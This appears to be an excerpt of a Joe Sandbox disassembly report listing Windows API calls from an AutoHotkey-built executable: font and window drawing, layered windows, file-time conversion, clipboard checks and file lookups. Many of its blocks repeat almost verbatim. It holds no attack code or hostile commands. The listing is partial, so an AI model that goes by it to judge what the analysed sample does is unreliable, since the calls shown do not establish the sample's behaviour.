Part of subcall function 0042FAE0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00430347
Part of subcall function 0042FAE0: GetStockObject.GDI32(00000011), ref: 00430353
Part of subcall function 0042FAE0: SelectObject.GDI32(00000000,00000000), ref: 0043035F
Part of subcall function 0042FAE0: GetTextFaceA.GDI32(00000000,00000040,?), ref: 00430377
Part of subcall function 0042FAE0: GetTextMetricsA.GDI32(00000000,?), ref: 00430386
Part of subcall function 0042FAE0: GetIconInfo.USER32(00000000,?), ref: 0043045E
Part of subcall function 0042FAE0: GetObjectA.GDI32(00000000,00000018,?), ref: 00430486
Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0043055E
Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 00430568
Part of subcall function 0042FAE0: MulDiv.KERNEL32(0000012C,00000060,00000060), ref: 00430581
Part of subcall function 0042FAE0: SetRect.USER32(?,00000000,00000000,?,?), ref: 004305B7
Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,?,00000048), ref: 00430608
Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0043063A
Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,?,00000048), ref: 00430660
Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00430699
Part of subcall function 0042FAE0: SelectObject.GDI32(?,?), ref: 004306AF
Part of subcall function 0042FAE0: DrawTextA.USER32(?,?,000000FF,?,00000450), ref: 004306F8
Part of subcall function 0042FAE0: MulDiv.KERNEL32(?,00000008,00000048), ref: 00430751
Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,?,?), ref: 0043075A
Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,?,00000048), ref: 00430798
Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,?,?), ref: 004307A1
Part of subcall function 0042FAE0: SelectObject.GDI32(00000000,?), ref: 004307F5
Part of subcall function 0042FAE0: DrawTextA.USER32(00000000,?,000000FF,?,00000410), ref: 00430837
Part of subcall function 0042FAE0: SelectObject.GDI32(00000000,?), ref: 00430856
Part of subcall function 0042FAE0: DeleteDC.GDI32(00000000), ref: 0043085D
Part of subcall function 0042FAE0: AdjustWindowRectEx.USER32(?,?,00000000,00000008), ref: 004308B6
Part of subcall function 0042FAE0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004308E6
Part of subcall function 0042FAE0: CreateWindowExA.USER32(?,AutoHotkey2,00000000,?,80000000,00000008,?,?,00000000,00000000,00400000,00000000), ref: 004309AF
Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000080,00000000,00000000), ref: 00430A00
Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00430A15
Part of subcall function 0042FAE0: GetClientRect.USER32(?,?), ref: 00430A20
Part of subcall function 0042FAE0: CreateWindowExA.USER32(00000000,static,?,00000000,?,?,?,?,?,00000000,00400000,00000000), ref: 00430A7A
Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00430A94
Part of subcall function 0042FAE0: CreateWindowExA.USER32(00000200,msctls_progress32,00000000,50000001,?,?,?,?,?,00000000,00000000,00000000), ref: 00430AD9
Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000406,?,?), ref: 00430B36
Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000409,00000000,?), ref: 00430B5C
Part of subcall function 0042FAE0: SendMessageA.USER32(?,00002001,00000000,?), ref: 00430B74
Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000402,?,00000000), ref: 00430B8D
Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00430B9C
Part of subcall function 0042FAE0: CreateWindowExA.USER32(00000000,static,?,00000000,?,?,?,?,?,00000000,00400000,00000000), ref: 00430BE5
Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00430C03

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426572, Relevance: 9.2, APIs: 6, Instructions: 175time

APIs

Part of subcall function 00435750: GetWindowLongA.USER32(00000000,000000EC), ref: 004357E2
Part of subcall function 00435750: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0043582F
Part of subcall function 00435750: SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 00435847
Part of subcall function 00435750: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0043585F
Part of subcall function 00435750: GetWindowLongA.USER32(00000000,000000EC), ref: 0043586D
Part of subcall function 00435750: SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 004358A0
Part of subcall function 00435750: SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 004358D6
Part of subcall function 00435750: SetLayeredWindowAttributes.USER32(00000000,00000000,00000000,00000002), ref: 004358E2
Part of subcall function 00435750: _strncpy.LIBCMT ref: 004358F8
Part of subcall function 00435750: SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 00435981
Part of subcall function 00435750: SetLayeredWindowAttributes.USER32(00000000,?,00000000,00000001), ref: 0043598F
Part of subcall function 00435750: GetWindowLongA.USER32(00000000,00000000), ref: 004359BB
Part of subcall function 00435750: SetLastError.KERNEL32(00000000,00000013,?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 00435A14
Part of subcall function 00435750: SetWindowLongA.USER32(?,?,00000000), ref: 00435A1D
Part of subcall function 00435750: GetLastError.KERNEL32(?,?,00000000,?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 00435A27
Part of subcall function 00435750: GetWindowLongA.USER32 ref: 00435A33
Part of subcall function 00435750: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00435A4A
Part of subcall function 00435750: InvalidateRect.USER32(?,00000000,00000001), ref: 00435A55
Part of subcall function 00435750: EnableWindow.USER32(?,00000000), ref: 00435AC0

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427211, Relevance: 9.2, APIs: 6, Instructions: 175time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00440FC0: FindFirstFileA.KERNEL32(004987E9,?), ref: 00440FEB
Part of subcall function 00440FC0: GetLastError.KERNEL32(?,?), ref: 00440FF6
Part of subcall function 00440FC0: FindClose.KERNEL32(00000000), ref: 00441034
Part of subcall function 00440FC0: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044108D

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004272C8, Relevance: 9.2, APIs: 6, Instructions: 174time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00441700: CreateFileA.KERNEL32(?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044173A
Part of subcall function 00441700: GetFileSizeEx.KERNEL32(00000000,?,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044174D
Part of subcall function 00441700: CloseHandle.KERNEL32(00000000), ref: 00441756
Part of subcall function 00441700: FindFirstFileA.KERNEL32(?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00441766
Part of subcall function 00441700: GetLastError.KERNEL32(?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00441771
Part of subcall function 00441700: FindClose.KERNEL32(00000000,?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 004417AD
Part of subcall function 00441700: __alldiv.INT64 ref: 0044181B

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426387, Relevance: 9.2, APIs: 6, Instructions: 174time

APIs

Part of subcall function 00433EA0: GetWindowRect.USER32(00000000,?), ref: 00433F6A
Part of subcall function 00433EA0: GetWindowRect.USER32(00000000,?), ref: 00433F72

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426E05, Relevance: 9.2, APIs: 6, Instructions: 174time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427C44, Relevance: 9.2, APIs: 6, Instructions: 174time

APIs

Part of subcall function 0045AB20: GetClientRect.USER32(00000000,?), ref: 0045ACF2
Part of subcall function 0045AB20: __Stoull.NTSTC_LIBCMT ref: 0045AD71
Part of subcall function 0045AB20: IsWindowVisible.USER32 ref: 0045B026
Part of subcall function 0045AB20: GetWindowRect.USER32(?,?), ref: 0045B039
Part of subcall function 0045AB20: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0045B050
Part of subcall function 0045AB20: InvalidateRect.USER32(?,?,00000001), ref: 0045B061
Part of subcall function 0045AB20: SendMessageA.USER32(?,0000014E,000000FF,00000000), ref: 0045B225
Part of subcall function 0045AB20: SetWindowTextA.USER32(?,001B2FD0), ref: 0045B230
Part of subcall function 0045AB20: SendMessageA.USER32(-0000130A,-0000130A,00000000,00000000), ref: 0045B274
Part of subcall function 0045AB20: SendMessageA.USER32(00000184,00000184,00000000,00000000), ref: 0045B28A

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427DA7, Relevance: 9.2, APIs: 6, Instructions: 173time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

